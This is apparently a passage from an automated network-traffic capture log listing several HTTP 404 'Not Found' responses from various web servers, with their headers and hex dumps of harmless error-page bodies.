74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 09 Jan 2025 07:31:46 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 09 Jan 2025 07:31:49 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 07:33:14 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aKUlHL683ELwzKqKjpRGIIactxbNF9BffdgXHiiG4vNJ0Magx0JHLDuuc9IBzbbgqkeYTIK4kQSyBqSB6YXhL5hFLlZZRdFF6n1Da9tTf%2B2AINp5JplvYc%2Fz7MjefJfxRCaKaGShqQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff2bcee9e4f233a-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=119469&min_rtt=119469&rtt_var=59734&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=811&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a Data Ascii: f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 07:33:17 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hEMo1bE%2BkElHt67%2BiG1pSKYbKHMDRp5AHXEH54Y7GoxJstUTbTmboWL%2Fo3E%2BbW2y6V9oTmLUtpefzQ4cineuoMR4Qpb7twArEL7a7nRpgbqVpFqayGGCNPim44Kj1MsyruTezWvGYA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff2bcff2ad6233a-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=120208&min_rtt=120208&rtt_var=60104&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=831&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 6e c2 30 10 44 ef fe 8a 2d 77 b2 01 71 e8 61 65 a9 25 41 45 0a 34 6a cd 81 a3 c1 5b 19 89 c6 c6 de 34 e2 ef ab 04 55 ea 75 e6 cd 68 86 9e aa f7 b5 39 b6 35 bc 99 5d 03 ed e1 b5 d9 ae 61 36 47 dc d6 66 83 58 99 ea e1 2c 8b 12 b1 de cf b4 22 2f df 57 4d 9e ad d3 8a e4 22 57 d6 ab 72 05 fb 20 b0 09 7d e7 08 1f a2 22 9c 20 3a 05 77 1f 73 0b fd 8f f1 0b ad 28 6a e3 19 12 df 7a ce c2 0e 0e 1f 0d 0c 36 43 17 04 be 46 0e 42 07 e2 2f 19 32 a7 1f 4e 05 61 1c 9b 92 56 64 9d 4b 9c b3 7e 89 f6 ec 19 3e 27 00 ac c0 30 0c c5 a9 bf e7 c8 7c f6 59 8a ec 43 84 36 24 81 e7 92 f0 2f a6 08 a7 5d 84 d3 9f 5f 00 00 00 ff ff e3 02 00 2b bb 83 fa 0a 01 00 00 0d 0a Data Ascii: e3Ln0D-wqae%AE4j[4Uuh95]a6GfX,"/WM"Wr }" :ws(jz6CFB/2NaVdK~>'0\|YC6$/]_+
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 07:33:20 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4d7HkROK0PpBZUiqET6ZYMvUcsSUe1z%2F%2BLK%2B%2FbdJ0fhU3kIPPrhYPWlX6mUVwkyop0eDXzxM9WNM5IoXMw%2BdzmsBa%2BxNzlRMUHFULc9eNIF8aRb65feLWHsKgcGjmmzAAf2uVu8VSw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff2bd0fc9c486d4-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=118903&min_rtt=118903&rtt_var=59451&sent=6&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7980&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 6e c2 30 10 44 ef fe 8a 2d 77 b2 01 71 e8 61 65 a9 25 41 45 0a 34 6a cd 81 a3 c1 5b 19 89 c6 c6 de 34 e2 ef ab 04 55 ea 75 e6 cd 68 86 9e aa f7 b5 39 b6 35 bc 99 5d 03 ed e1 b5 d9 ae 61 36 47 dc d6 66 83 58 99 ea e1 2c 8b 12 b1 de cf b4 22 2f df 57 4d 9e ad d3 8a e4 22 57 d6 ab 72 05 fb 20 b0 09 7d e7 08 1f a2 22 9c 20 3a 05 77 1f 73 0b fd 8f f1 0b ad 28 6a e3 19 12 df 7a ce c2 0e 0e 1f 0d 0c 36 43 17 04 be 46 0e 42 07 e2 2f 19 32 a7 1f 4e 05 61 1c 9b 92 56 64 9d 4b 9c b3 7e 89 f6 ec 19 3e 27 00 ac c0 30 0c c5 a9 bf e7 c8 7c f6 59 8a ec 43 84 36 24 81 e7 92 f0 2f a6 08 a7 5d 84 d3 9f 5f 00 00 00 ff ff 0d 0a Data Ascii: d8Ln0D-wqae%AE4j[4Uuh95]a6GfX,"/WM"Wr }" :ws(jz6CFB/2NaVdK~>'0\|YC6$/]_
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 07:33:22 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oMgcwJnFrBAN4MHB0LUOTFf74kn6YHiBSZoNZU73imc8FiKtOJqaQObOyYIgFzwQ4GSnFvUEgl3K79bge%2FISS3hAghht8g%2Bq42p4JhzGLEMQ%2FRTshHoYhEzb9uWV8WP1UGReRhXjcg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff2bd2059f72a00-ORDalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=119228&min_rtt=119228&rtt_var=59614&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=544&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 62 75 79 73 70 65 65 63 68 73 74 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: 10a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.buyspeechst.shop Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 07:33:58 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=12qwGKUccMWc2Z9VVpNI1y5S5R6kI0PPK%2BRFlK8TtyACYO%2FnDDcaZ1U4yAShPvlOLxDGBKuK6nj%2Fqd9oJx8zPf%2F80dVq13%2FnzIJcLhMLZ0N9XFfKFN7pBW4iw%2BvDAjvbB3B6"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff2bdfe5c6786d4-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=118864&min_rtt=118864&rtt_var=59432&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=799&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 07:34:01 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IqLUQApFeB5fvYw8IUrGISACwZmarTlaIXEitTy87MY%2BzounK%2F0cF6BoW2u953MOYCi33%2BcHB7j3LJA86NK%2F8zKHjgO1G5HumbOjro761x2SIqXEpaaOKVL80Z7m8ZLjOiND"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff2be0eedea86d4-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=119272&min_rtt=119272&rtt_var=59636&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=819&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 07:34:03 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=btUAmvBfR75ul0kbjnXv5yYOqvfMMCoqjCf6NDHJV5%2BcRwJriw0bIZSG0EFDTWZ4A%2FbHViWAEJ91hbFXE4pU7ioLqt5IZqqc7BysPT2tc58Q0jT0qXTh%2Btzwwez9vmLzJeks"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff2be1f7a7f233a-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=119339&min_rtt=119339&rtt_var=59669&sent=5&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7968&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 07:34:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ETv3hJUDLN4b%2FfgTjNkRGwu5XIwzFIOIdf8yvsTmAVCyp4yMJqlCQZ8dxRJAbpQ9MSJF8BRKqWUW6l9cIIUvTFpH2K6shndda%2FQq0iZQmQmGRY11fgMG%2Bo1D4M0Alb15UFJY"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff2be301e896378-ORDalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=118629&min_rtt=118629&rtt_var=59314&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=540&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 07:34:11 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta 